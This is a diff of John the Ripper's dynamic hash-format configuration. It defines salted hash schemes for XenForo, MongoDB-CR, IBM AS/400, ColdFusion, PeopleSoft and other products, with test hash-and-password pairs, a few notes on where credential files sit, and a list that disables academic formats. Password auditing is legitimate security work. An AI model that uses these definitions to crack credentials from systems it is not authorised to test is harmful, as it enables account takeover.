+Test=$dynamic_1501$713769f2b8824e8f5abc2d3e4f9326f32ff1d46b$5bfe6f1c0f7a8d802032d1bf85225400:redminefff
+
+# In XenForo, the hashed password is stored in the following form(s),
+# sha1(sha1(password).salt)
+#
+# OR
+#
+# sha256(sha256(password).salt)
+#   NOTE, added MGF_KEYS_BASE16_IN1_SHA1 and MGF_KEYS_BASE16_IN1_SHA256 flags
+#   and the many salts speed is now greatly improved.
+[List.Generic:dynamic_1502]
+Expression=sha1(sha1($p).$s) (XenForo SHA-1)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA1
+SaltLen=-120  // dont know, so made it big, jfoug
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__set_input_len_40
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1502$fd74fa6521e515921ad843a8465e34b703960db1$dummysalt:password
+
+# note this hash could use the pre-compute limb-1 optimization we are wanting to do.
+# that would take it from 3 sha256 limbs to 1 sha256 limb (in many salts). Right now,
+# we have reduced it from 3 limbs to 2 limbs (for many salts).
+[List.Generic:dynamic_1503]
+Expression=sha256(sha256($p).$s) (XenForo SHA-256)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA256
+MaxInputLenX86=110
+SaltLen=-120  // dont know, so made it big, jfoug
+MaxInputLen=110
+Func=DynamicFunc__set_input_len_64
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1503$453f2e21fa6c150670d3ecf0e4a0ff3bab8b1903c2e96ad655d960b95f104248$697de9eda4a02563a7ec66d42d4a96995cb2948e29ab76fbcc89e8db71dd10f1:password
+Test=$dynamic_1503$a8a0e9545c1475e8546f8546d87fe2516cf525c12ad79a6a7a8fee2fb0d8afd3$697de9eda4a02563a7ec66d42d4a96995cb2948e29ab76fbcc89e8db71dd10f1:verlongcrappypassword01234567890
+
+# http://wiki.insidepro.com/index.php/sha1($a.$p.$s)
+[List.Generic:dynamic_1504]
+Expression=sha1($s.$p.$s)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+SaltLen=-68  // dont know, so made it max size that fits in 4 limb buffer, jfoug
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1504$114e4978430ee4fe2bc492f059f5c7aa400bf2fe$Salt:abcd
+Test=$dynamic_1504$aab04277ffba1dee47288b05fa58d25e49a1935e$Salt:12345678
+Test=$dynamic_1504$3b71a92fb2f4aeda9ae38211b67c5a4dc2a1771a$Salt:
+
+# md5($p.$s.md5($p.$s)) (saw it on https://hashcat.net/trac)
+[List.Generic:dynamic_1505]
+Expression=md5($p.$s.md5($p.$s))
+# to make flat (allows much longer passwords and salts)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+SaltLen=-64
+Flag=MGF_SALTED
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_keys2
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_1505$b8bbabb1eb9802a2e962de0207ca5172$aaaSXB:test1
+
+# https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/
+[List.Generic:dynamic_1506]
+Expression=md5($u.:XDB:.$p) (Oracle 12c "H" hash)
+Flag=MGF_USERNAME
+CONST1=:XDB:
+MaxInputLen=23
+MaxInputLenX86=110
+SaltLen=-27
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt
+Test=$dynamic_1506$dc9894a01797d91d92eca1da66242209:epsilon:DEMO
+
+# salt here is really a const.
+[List.Generic:dynamic_1507]
+Expression=sha1(utf16($const.$p)) (Mcafee master pass)
+CONST1=\x01\x0f\x0d\x33
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_INPUT_20_BYTE
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1507$d4eaf666d09316f9d61b14753353a73d5fbcf048:test
+Test=$dynamic_1507$9dbe0d0ea16ae0a14c0c81a7c962b5a16e777259:test1
+
+# Newer SunShop Shopping Cart. Older SunShop 4.1.0 uses md5($p) as the hashing
+# scheme. It seems that both these hash types can live together in a single
+# SunShop database.
+[List.Generic:dynamic_1518]
+Expression=md5(sha1($p).md5($p).sha1($p))
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_1518$c756b56aed8d6748ee63e1e270c71a3f:password
+Test=$dynamic_1518$8e6db6b58e9e326aba17e19a36c79d95:menura
+Test=$dynamic_1518$2abe0f6794cc57663527ce7ab81fdaf3:stealth
+Test=$dynamic_1518$08793c9ab17a586b3af71d28e1cae2c1:fletch
+Test=$dynamic_1518$b19d46258f6a00f151367024789d71f1:smurfs
+Test=$dynamic_1518$065c78f47a7da2e2ca2bd76eed10f6cd:ralphy1
+Test=$dynamic_1518$82f7dd8a757d1a79126817940336087d:Kitesurfing1
+
+# Telegram for Android hashes. Use ../run/telegram2john.py to extract the hashes.
+[List.Generic:dynamic_1528]
+Expression=sha256($s.$p.$s) (Telegram for Android)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+SaltLen=16
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1528$dab5552484cc327bd6d23b2a1ceb55b6ffb30f305bc09962a9102a6cec63773c$HEX$9533cd79bf8739bdd47ff8998aaf578c:1234
+Test=$dynamic_1528$cad3fe1d4df2bf68c23f003e771c79fa42d10ae9a03671019d9c91a266a91372$HEX$901c3371d7de4b525b0e0a6abf4f392e:0987
+
+# DeepSound hashes. Use ../run/deepsound2john.py to extract the hashes.
+[List.Generic:dynamic_1529]
+Expression=sha1($p null_padded_to_len_32) (DeepSound)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_FLAT_BUFFERS
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__set_input_len_32
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1529$6f9fa2285514c73bcac858496361f19f477ee416:deep5ound
+Test=$dynamic_1529$66cad8923499423fa0c1d3974256d957840b9d69:iqlusion
+Test=$dynamic_1529$a3eb15172cc7e6090a2eb32e6dc8c3bd30c39a02:abcdefghijklmnopqrstuvwxyz012345
+
+# MONGODB-CR system hashes
+# Input hash format => username:$dynamic_1550$hash
+[List.Generic:dynamic_1550]
+Expression=md5($u.:mongo:.$p) (MONGODB-CR system hash)
+Flag=MGF_USERNAME
+CONST1=:mongo:
+MaxInputLen=23
+MaxInputLenX86=110
+# note, saltlen + length(:mongo:) + length(plain) must stay <= 55 for SIMD
+#   so 25+7+23 == 55
+SaltLen=-25
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt
+Test=$dynamic_1550$08f32db65f837a52cd791bd923a61e95$$Usomeadmin:secret
+Test=$dynamic_1550$819951ad797c3564148a77cbecf3b166$$Uadmin:secret@12345
+
+# MONGODB-CR network hashes  (user name < 8 bytes long)
+# Input hash format => username:$dynamic_1551$hash$salt$$Uusername
+[List.Generic:dynamic_1551]
+Expression=md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+Flag=MGF_USERNAME
+CONST1=:mongo:
+MaxInputLen=23
+MaxInputLenX86=110
+# note, saltlen + length(:mongo:) + length(plain) must stay <= 55 for SIMD
+#   so 25+7+23 == 55
+SaltLen=16
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_userid2
+Func=DynamicFunc__crypt
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1551$0c85e3f74adce5d037426791940c820a$58d3229c83e3f87e$$Usa:sa
+Test=$dynamic_1551$797d7e18879446845f10ae9d519960b2$10441db416a99ffc$$Usa:longpassword
+Test=$dynamic_1551$a5ca2c517c06fdfb773144d53fb26f56$9b90cf265f3194d7$$UHerman:123456789
+Test=$dynamic_1551$441d6ece7356c67dcc69dd26e7e0501f$be8fa52f0e64c250$$Usz110:passWOrd
+Test=$dynamic_1551$c95e106f1d9952c88044a0b21a6bd3fd$304b81adddfb4d6f$$Ujack:
+
+# MONGODB-CR network hashes  (user name >= 8 bytes long)
+# Input hash format => username:$dynamic_1552$hash$salt$$Uusername
+[List.Generic:dynamic_1552]
+Expression=md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+Flag=MGF_USERNAME
+Flag=MGF_FLAT_BUFFERS
+CONST1=:mongo:
+MaxInputLen=110
+MaxInputLenX86=110
+SaltLen=16
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_userid2
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_1552$10290925d16d81e50db242c9f3572d91$0000000000000000$$Ulongusername:longpassword@12345678
+Test=$dynamic_1552$53257e018399a241849cb04c70ba8daa$0000000000000000$$Ulongusername:longpassword
+Test=$dynamic_1552$1abe48bac6ad0bf567ab51b094f026a9$86336266301fb552$$Ulongusername:longpassword
+Test=$dynamic_1552$5c414259f7f7a42f8c4d1b6ffb37913a$8c82aec197929775$$Ueight18_characters:123
+
+# SocialEngine hashes (Elijah [W&P])
+#
+# hash = md5('core secret'.'password'.'salt')
+# core.secret -> MySQL 'engine4_core_settings' table, row 'core.secret'
+# salt -> MySQL 'engine4_users' table, 'salt' column
+[List.Generic:dynamic_1560]
+Expression=md5($s.$p.$s2) (SocialEngine)
+Flag=MGF_SALTED
+Flag=MGF_SALTED2
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-46
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_2nd_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_1560$55fce7789372d510023fc819c0ce55a6$a6ebe407fa6e2337cb2deb573d17791e$$21060744:test1
+Test=$dynamic_1560$fd880f2c10f148c409f3c850a52201b0$6cbe843e024f59827c55f3a32d1c3be9$$22262250:thatsworking
+Test=$dynamic_1560$2b199a07acf8e9e36e47ec2a0178933b$2a4c7cf421315f49fae230e80acfa218$$29597016:test3
+Test=$dynamic_1560$13d806a7e87bc1b551478742349882a9$2161869cadcb41f1cc1e939f191c0bb35e58a9a7$$21060744:123123
+
+# ColdFusion 11 hashes (Ivan Novikov <in@wallarm.com>)
+# Hash is password variable from ./lib/password.properties
+# Salt is admin.userid.root.salt variable from ./lib/neo-security.xml
+[List.Generic:dynamic_1588]
+Expression=sha256($s.sha1($p)) (ColdFusion 11)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_BASE_16_OUTPUT_UPCASE
+SaltLen=64
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys2
+Func=DynamicFunc__SHA1_crypt_input2_append_input1
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1588$37F816D599BFD69C5A0D750198AB6E46E26CEB120C9AF3B1E5306515058CBAE8$D7B6D57262290BC0A634D2D1A0DFE59F1FBE47885DBC9BB1CEBA8EA9D09D9839:test1234
+
+# IBM AS/400 SHA1 hashes   !NOTE, salt is pre prepared, utf16be(space_pad_10(uc($user_name))
+[List.Generic:dynamic_1590]
+Expression=sha1(utf16be(space_pad_10(uc($s)).$p)) (IBM AS/400 SHA1)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_BASE_16_OUTPUT_UPCASE
+Flag=MGF_UTF8
+SaltLen=20
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__setmode_unicodeBE
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1590$4C106E52CA196986E1C52C7FCD02AF046B76C73C$HEX$0052004F00420020002000200020002000200020:banaan
+Test=$dynamic_1590$CED8050C275A5005D101051FF5BCCADF693E8AB7$HEX$0042004100520054002000200020002000200020:Kulach007
+Test=$dynamic_1590$1BA6C7D54E9696ED33F4DF201E348CA8CA815F75$HEX$005300590053004F005000520020002000200020:T0Psecret!
+Test=$dynamic_1590$A1284B4F1BDD7ED598D4B5060D861D6D614620D3$HEX$00530059005300540045004D0020002000200020:P@ssword01
+Test=$dynamic_1590$94C55BC7EDF1996AC62E8145CDBFA285CA79ED2E$HEX$0051005300590053004400420041002000200020:qsysdba
+Test=$dynamic_1590$CDF4063E283B51EDB7B9A8E6E542042000BD9AE9$HEX$0051005300450043004F00460052002000200020:qsecofr!
+Test=$dynamic_1590$44D43148CFE5CC3372AFD2610BEE3D226B2B50C5$HEX$0054004500530054003100200020002000200020:password1
+Test=$dynamic_1590$349B12D6588843A1632649A501ABC353EBF409E4$HEX$0054004500530054003200200020002000200020:secret
+Test=$dynamic_1590$A97F2F9ED9977A8A628F8727E2851415B06DC540$HEX$0054004500530054003300200020002000200020:test3
+
+# wbb3 SHA1 hashes
+[List.Generic:dynamic_1592]
+Expression=sha1($s.sha1($s.sha1($p))) (wbb3)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA1
+Flag=MGF_FULL_CLEAN_REQUIRED2
+SaltLen=40
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__LargeHash_set_offset_40
+Func=DynamicFunc__SHA1_crypt_input2_at_offset_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1592$e2063f7c629d852302d3020599376016ff340399$0b053db07dc02bc6f6e24e00462f17e3c550afa9:123456
+Test=$dynamic_1592$f6975cc560c5d03feb702158d08f90bf2fa773d6$0b053db07dc02bc6f6e24e00462f17e3c550afa9:password
+Test=$dynamic_1592$2c56d23b44eb122bb176dfa2a1452afaf89f1143$a710463f75bf4568d398db32a53f9803007388a3:123456
+Test=$dynamic_1592$2596b5f8e7cdaf4b15604ad336b810e8e2935b1d$1039145e9e785ddb2ac7ccca89ac1b159b595cc1:12345678
+Test=$dynamic_1592$26496a87c1a7dd68f7beceb2fc40b6fc4223a453$db763342e23f8ccdbd9c90d1cc7896d80b7e0a44:12345678
+Test=$dynamic_1592$d945c02cf85738b7db4f4f05edd676283280a513$bf2c7d0c8fb6cb146adf8933e32da012d31b5bbb:123456789
+Test=$dynamic_1592$e3e03fe02223c5030e834f81997f614b43441853$d132b22d3f1d942b99cc1f5fbd5cc3eb0824d608:1234567890
+
+# All credit for this format goes to Alexey Tyurin (ERPScan), François Gaudreault, and Martin Lemay
+# http://gosecure.net/2016/05/04/oracle-peoplesoft-still-a-threat-for-enterprises/ (source)
+# https://erpscan.com/press-center/blog/peoplesoft-security-part-4-peoplesoft-pentest-using-tokenchpoken-tool/
+# https://erpscan.com/wp-content/uploads/tools/ERPScan-tockenchpoken.zip
+[List.Generic:dynamic_1600]
+Expression=sha1($s.utf16le($p)) (Oracle PeopleSoft PS_TOKEN)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_SALTED
+Flag=MGF_UTF8
+SaltLen=-150
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1600$e6155f87b073451076d81e3505f8b9fcd3f53b5a$HEX$710000000403020101000000bc0200000000000010500050005700450042004500580054000645004e0047000e50005300460054005f00480052003432003000310036002d00300034002d00300038002d00310039002e00320037002e00300035002e0030003000300030003000320000:password
+Test=$dynamic_1600$b5e335754127b25ba6f99a94c738e24cd634c35a$HEX$aa07d396f5038a6cbeded88d78d1d6c907e4079b3dc2e12fddee409a51cc05ae73e8cc24d518c923a2f79e49376594503e6238b806bfe33fa8516f4903a9b4:hashcat
+Test=$dynamic_1600$ac869d82e768c1af0e2b80679ddee8efe769d480$HEX$650000000403020101000000bc0200000000000004500053000645004e0047000e50005300460054005f00480052003432003000310035002d00300037002d00300031002d00300038002e00300036002e00340036002e0039003900390035003400330000:password@12345
+
+# https://github.com/neo-project/neo-gui (tested with Neo GUI v2.3.2)
+[List.Generic:dynamic_1608]
+Expression=sha256(sha256_raw(sha256_raw($p))) (Neo Wallet)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_INPUT_32_BYTE
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__LargeHash_OUTMode_raw
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA256_crypt_input1_overwrite_input2
+Func=DynamicFunc__SHA256_crypt_input2_overwrite_input2
+Func=DynamicFunc__SHA256_crypt_input2_to_output1_FINAL
+Test=$dynamic_1608$f2a778f1a6ed3d5bc59a5d79104c598f3f07093f240ca4e91333fb09ed4f36da:abc
+Test=$dynamic_1608$8b12147de49a2832aca47a5bf6fbca12689420ac14c2547ab90f6d495f21f6dc:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEF
+Test=$dynamic_1608$2a1a9918abe22f14d737462301e0c17b125a5f9ba11dc1e872b5320180437d12:openwall
+
+# https://www.oneidentity.com/products/authentication-services/
+# Author: Tim Brown. Borrowed from https://github.com/portcullislabs/linikatz (under BSD 3-Clause "New" or "Revised" License).
+[List.Generic:dynamic_1602]
+Expression=sha256(#.$salt.-.$pass) (QAS vas_auth)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_USERNAME
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+CONST1=#
+CONST2=-
+SaltLen=36
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_input1_from_CONST2
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1602$9b4d1328a3dc064704301d2da2975f97b9212d8f08539214b27fd3106dc208ff$C34208EA-8C33-473D-A9B4-53FB40347EA0:P0rtcu11i5!:Administrator@3rd-party.example.org
+
+# this should be last line of the file.  Put other formats before this.  The formats in
+# the following included file are replacement formats for the MD4/5 formats which use
+# 'intermixed' SSE for speed, BUT which can not process longer passwords, due to being
+# limited to a single SSE buffer.  The formats in dynamic_flat_sse_formats.conf are using
+# the large hash 'flat' methods, which allow multiple SSE buffers. They are slower (sometimes
+# a LOT slower), than the intermixed SSE.  But they are much faster than oSSL code, and can
+# take full length passwords (110 bytes).
+
+.include <dynamic_flat_sse_formats.conf>
@@ -0,0 +1,525 @@
+# the set of dynamics was not disabled due to not working, but due to simply
+# being academic formats, and test cases, and not ITW formats
+dynamic_51 = Y
+dynamic_52 = Y
+dynamic_53 = Y
+dynamic_54 = Y
+dynamic_55 = Y
+dynamic_56 = Y
+dynamic_57 = Y
+dynamic_58 = Y
+# dyna-61 used by formspring and should not be disabled.
+dynamic_61 = N
+dynamic_62 = Y
+dynamic_63 = Y
+dynamic_64 = Y
+dynamic_65 = Y
+dynamic_66 = Y
+dynamic_67 = Y
+dynamic_68 = Y
+dynamic_71 = Y
+dynamic_72 = Y
+dynamic_73 = Y
+dynamic_74 = Y
+dynamic_75 = Y
+dynamic_76 = Y
+dynamic_77 = Y
+dynamic_78 = Y
+dynamic_81 = Y
+dynamic_82 = Y
+dynamic_83 = Y
+dynamic_84 = Y
+dynamic_85 = Y
+dynamic_86 = Y
+dynamic_87 = Y
+dynamic_88 = Y
+dynamic_91 = Y
+dynamic_92 = Y
+dynamic_93 = Y
+dynamic_94 = Y
+dynamic_95 = Y
+dynamic_96 = Y
+dynamic_97 = Y
+dynamic_98 = Y
+dynamic_101 = Y
+dynamic_102 = Y
+dynamic_103 = Y
+dynamic_104 = Y
+dynamic_105 = Y
+dynamic_106 = Y
+dynamic_107 = Y
+dynamic_108 = Y
+dynamic_111 = Y
+dynamic_112 = Y
+dynamic_113 = Y
+dynamic_114 = Y
+dynamic_115 = Y
+dynamic_116 = Y
+dynamic_117 = Y
+dynamic_118 = Y
+dynamic_121 = Y
+dynamic_122 = Y
+dynamic_123 = Y
+dynamic_124 = Y
+dynamic_125 = Y
+dynamic_126 = Y
+dynamic_127 = Y
+dynamic_128 = Y
+dynamic_131 = Y
+dynamic_132 = Y
+dynamic_133 = Y
+dynamic_134 = Y
+dynamic_135 = Y
+dynamic_136 = Y
+dynamic_137 = Y
+dynamic_138 = Y
+dynamic_141 = Y
+dynamic_142 = Y
+dynamic_143 = Y
+dynamic_144 = Y
+dynamic_145 = Y
+dynamic_146 = Y
+dynamic_147 = Y
+dynamic_148 = Y
+dynamic_151 = Y
+dynamic_152 = Y
+dynamic_153 = Y
+dynamic_154 = Y
+dynamic_155 = Y
+dynamic_156 = Y
+dynamic_157 = Y
+dynamic_158 = Y
+dynamic_161 = Y
+dynamic_162 = Y
+dynamic_163 = Y
+dynamic_164 = Y
+dynamic_165 = Y
+dynamic_166 = Y
+dynamic_167 = Y
+dynamic_168 = Y
+dynamic_171 = Y
+dynamic_172 = Y
+dynamic_173 = Y
+dynamic_174 = Y
+dynamic_175 = Y
+dynamic_176 = Y
+dynamic_177 = Y
+dynamic_178 = Y
+dynamic_181 = Y
+dynamic_182 = Y
+dynamic_183 = Y
+dynamic_184 = Y
+dynamic_185 = Y
+dynamic_186 = Y
+dynamic_187 = Y
+dynamic_188 = Y
+dynamic_191 = Y
+dynamic_192 = Y
+dynamic_193 = Y
+dynamic_194 = Y
+dynamic_195 = Y
+dynamic_196 = Y
+dynamic_197 = Y
+dynamic_198 = Y
+dynamic_201 = Y
+dynamic_202 = Y
+dynamic_203 = Y
+dynamic_204 = Y
+dynamic_205 = Y
+dynamic_206 = Y
+dynamic_207 = Y
+dynamic_208 = Y
+dynamic_211 = Y
+dynamic_212 = Y
+dynamic_213 = Y
+dynamic_214 = Y
+dynamic_215 = Y
+dynamic_216 = Y
+dynamic_217 = Y
+dynamic_218 = Y
+dynamic_221 = Y
+dynamic_222 = Y
+dynamic_223 = Y
+dynamic_224 = Y
+dynamic_225 = Y
+dynamic_226 = Y
+dynamic_227 = Y
+dynamic_228 = Y
+dynamic_231 = Y
+dynamic_232 = Y
+dynamic_233 = Y
+dynamic_234 = Y
+dynamic_235 = Y
+dynamic_236 = Y
+dynamic_237 = Y
+dynamic_238 = Y
+dynamic_241 = Y
+dynamic_242 = Y
+dynamic_243 = Y
+dynamic_244 = Y
+dynamic_245 = Y
+dynamic_246 = Y
+dynamic_247 = Y
+dynamic_248 = Y
+dynamic_251 = Y
+dynamic_252 = Y
+dynamic_253 = Y
+dynamic_254 = Y
+dynamic_255 = Y
+dynamic_256 = Y
+dynamic_257 = Y
+dynamic_258 = Y
+dynamic_261 = Y
+dynamic_262 = Y
+dynamic_263 = Y
+dynamic_264 = Y
+dynamic_265 = Y
+dynamic_266 = Y
+dynamic_267 = Y
+dynamic_268 = Y
+dynamic_271 = Y
+dynamic_272 = Y
+dynamic_273 = Y
+dynamic_274 = Y
+dynamic_275 = Y
+dynamic_276 = Y
+dynamic_277 = Y
+dynamic_278 = Y
+dynamic_281 = Y
+dynamic_282 = Y
+dynamic_283 = Y
+dynamic_284 = Y
+dynamic_285 = Y
+dynamic_286 = Y
+dynamic_287 = Y
+dynamic_288 = Y
+dynamic_291 = Y
+dynamic_292 = Y
+dynamic_293 = Y
+dynamic_294 = Y
+dynamic_295 = Y
+dynamic_296 = Y
+dynamic_297 = Y
+dynamic_298 = Y
+dynamic_301 = Y
+dynamic_302 = Y
+dynamic_303 = Y
+dynamic_304 = Y
+dynamic_305 = Y
+dynamic_306 = Y
+dynamic_307 = Y
+dynamic_308 = Y
+dynamic_311 = Y
+dynamic_312 = Y
+dynamic_313 = Y
+dynamic_314 = Y
+dynamic_315 = Y
+dynamic_316 = Y
+dynamic_317 = Y
+dynamic_318 = Y
+dynamic_321 = Y
+dynamic_322 = Y
+dynamic_323 = Y
+dynamic_324 = Y
+dynamic_325 = Y
+dynamic_326 = Y
+dynamic_327 = Y
+dynamic_328 = Y
+dynamic_331 = Y
+dynamic_332 = Y
+dynamic_333 = Y
+dynamic_334 = Y
+dynamic_335 = Y
+dynamic_336 = Y
+dynamic_337 = Y
+dynamic_338 = Y
+dynamic_341 = Y
+dynamic_342 = Y
+dynamic_343 = Y
+dynamic_344 = Y
+dynamic_345 = Y
+dynamic_346 = Y
+dynamic_347 = Y
+dynamic_348 = Y
+dynamic_351 = Y
+dynamic_352 = Y
+dynamic_353 = Y
+dynamic_354 = Y
+dynamic_355 = Y
+dynamic_356 = Y
+dynamic_357 = Y
+dynamic_358 = Y
+dynamic_361 = Y
+dynamic_362 = Y
+dynamic_363 = Y
+dynamic_364 = Y
+dynamic_365 = Y
+dynamic_366 = Y
+dynamic_367 = Y
+dynamic_368 = Y
+dynamic_371 = Y
+dynamic_372 = Y
+dynamic_373 = Y
+dynamic_374 = Y
+dynamic_375 = Y
+dynamic_376 = Y
+dynamic_377 = Y
+dynamic_378 = Y
+dynamic_381 = Y
+dynamic_382 = Y
+dynamic_383 = Y
+dynamic_384 = Y
+dynamic_385 = Y
+dynamic_386 = Y
+dynamic_387 = Y
+dynamic_388 = Y
+dynamic_391 = Y
+dynamic_392 = Y
+dynamic_393 = Y
+dynamic_394 = Y
+dynamic_395 = Y
+dynamic_396 = Y
+dynamic_397 = Y
+dynamic_398 = Y
+dynamic_401 = Y
+dynamic_402 = Y
+dynamic_403 = Y
+dynamic_404 = Y
+dynamic_405 = Y
+dynamic_406 = Y
+dynamic_407 = Y
+dynamic_408 = Y
+dynamic_411 = Y
+dynamic_412 = Y
+dynamic_413 = Y
+dynamic_414 = Y
+dynamic_415 = Y
+dynamic_416 = Y
+dynamic_417 = Y
+dynamic_418 = Y
+dynamic_421 = Y
+dynamic_422 = Y
+dynamic_423 = Y
+dynamic_424 = Y
+dynamic_425 = Y
+dynamic_426 = Y
+dynamic_427 = Y
+dynamic_428 = Y
+dynamic_431 = Y
+dynamic_432 = Y
+dynamic_433 = Y
+dynamic_434 = Y
+dynamic_435 = Y
+dynamic_436 = Y
+dynamic_437 = Y
+dynamic_438 = Y
+dynamic_441 = Y
+dynamic_442 = Y
+dynamic_443 = Y
+dynamic_444 = Y
+dynamic_445 = Y
+dynamic_446 = Y
+dynamic_447 = Y
+dynamic_448 = Y
+dynamic_451 = Y
+dynamic_452 = Y
+dynamic_453 = Y
+dynamic_454 = Y
+dynamic_455 = Y
+dynamic_456 = Y
+dynamic_457 = Y
+dynamic_458 = Y
+dynamic_461 = Y
+dynamic_462 = Y
+dynamic_463 = Y
+dynamic_464 = Y
+dynamic_465 = Y
+dynamic_466 = Y
+dynamic_467 = Y
+dynamic_468 = Y
+dynamic_471 = Y
+dynamic_472 = Y
+dynamic_473 = Y
+dynamic_474 = Y
+dynamic_475 = Y
+dynamic_476 = Y
+dynamic_477 = Y
+dynamic_478 = Y
+dynamic_481 = Y
+dynamic_482 = Y
+dynamic_483 = Y
+dynamic_484 = Y
+dynamic_485 = Y
+dynamic_486 = Y
+dynamic_487 = Y
+dynamic_488 = Y
+dynamic_491 = Y
